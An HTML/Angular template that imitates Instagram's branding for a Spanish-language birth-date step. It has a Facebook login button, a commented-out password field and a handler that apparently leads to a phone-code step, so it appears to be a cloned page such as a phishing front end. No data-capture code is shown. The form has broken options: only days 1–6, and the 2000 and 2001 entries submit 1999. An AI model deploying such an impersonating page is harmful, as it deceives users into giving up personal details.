<article class="article">
    <div class="content">
        <div class="login-box">
            <div class="header">
                <img class="logo" src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/2a/Instagram_logo.svg/1200px-Instagram_logo.svg.png" alt="Instagram" />
            </div>
            <!-- Header end -->
            <div class="form-wrap">
                <form class="form">
                    <div class="input-box">
                        <h2 class="_aahw">
                            Añade tu fecha de nacimiento
                        </h2>
                        <!-- <span class="text">Este dato no se incluirá en tu perfil público.</span> -->
                        <a href="#" class="forgot">¿Por qué tengo que facilitar mi fecha de nacimiento?</a>
                    </div>

                    <div class="input-box" style="margin: 10px 40px 18px;">
                        <button class="_acan _acap _acas _aj1-" type="button"><span class="_9zlu _aah_"></span>Iniciar sesión con Facebook</button>
                    </div>

                    <!-- <div class="input-box">
                        <input type="password" name="password" id="password" placeholder="Contraseña" aria-describedby="" maxlength="30" aria-required="true" autocapitalize="off" autocorrect="off" #userPassword required />
                    </div> -->

                    <div class="formulario">
                        <div class="div_nacimiento">
                            <!-- <span class="span_nacimiento">Fecha de nacimiento</span> -->

                            <select class="input_textual dia_nacimiento" name="dia_nacimiento">
                                <option value="1">1</option>
                                <option value="2">2</option>
                                <option value="3">3</option>
                                <option value="4">4</option>
                                <option value="5">5</option>
                                <option value="6">6</option>
                            </select>

                            <select class="input_textual mes_nacimiento" name="mes_nacimiento">
                                <option value="1">Enero</option>
                                <option value="2">Febrero</option>
                                <option value="3">Marzo</option>
                                <option value="4">Abril</option>
                                <option value="5">Mayo</option>
                                <option value="6">Junio</option>
                                <option value="7">Julio</option>
                                <option value="8">Agosto</option>
                                <option value="9">Septiembre</option>
                                <option value="10">Octubre</option>
                                <option value="11">Noviembre</option>
                                <option value="12">Diciembre</option>
                            </select>

                            <select class="input_textual anio_nacimiento" name="anio_nacimiento">
                                <option value="1994">1994</option>
                                <option value="1995">1995</option>
                                <option value="1996">1996</option>
                                <option value="1997">1997</option>
                                <option value="1998">1998</option>
                                <option value="1999" selected>1999</option>
                                <option value="1999">2000</option>
                                <option value="1999">2001</option>
                            </select>

                            <span class="span_nacimiento">Es necesario que indice su fecha de nacimiento</span>
                            <span class="span_nacimiento">Indica tu fecha de nacimiento, aunque esta cuenta sea para un negocio, una mascota, etc.</span>
                        </div>

                        
                    </div>

                    <span class="button-box">
                        <button class="btn" type="submit" name="submit" (click)="continueViewCodePhone()">
                            <span>Continuar</span>
                        </button>
                    </span>
                </form>
            </div>

            <!-- Form-wrap end -->
        </div>
        <!-- Login-box end -->

        <div class="login-box">
            <p class="text">¿Tienes una cuenta?<a (click)="sigIn()">Entrar</a></p>
        </div>
        <!-- Signup-box end -->

        <div class="app">
            <p>Descarga la aplicación.</p>
            <div class="app-img">
                <a href="https://itunes.apple.com/app/instagram/id389801252?pt=428156&amp;ct=igweb.loginPage.badge&amp;mt=8">
                    <img src="https://www.instagram.com/static/images/appstore-install-badges/badge_ios_english-en.png/4b70f6fae447.png" />
                </a>
                <a href="https://play.google.com/store/apps/details?id=com.instagram.android&amp;referrer=utm_source%3Dinstagramweb%26utm_campaign%3DloginPage%26utm_medium%3Dbadge">
                    <img src="https://www.instagram.com/static/images/appstore-install-badges/badge_android_english-en.png/f06b908907d5.png" />
                </a>
            </div>
            <!-- App-img end-->
        </div>
        <!-- App end -->
    </div>
    <!-- Content end -->
</article>
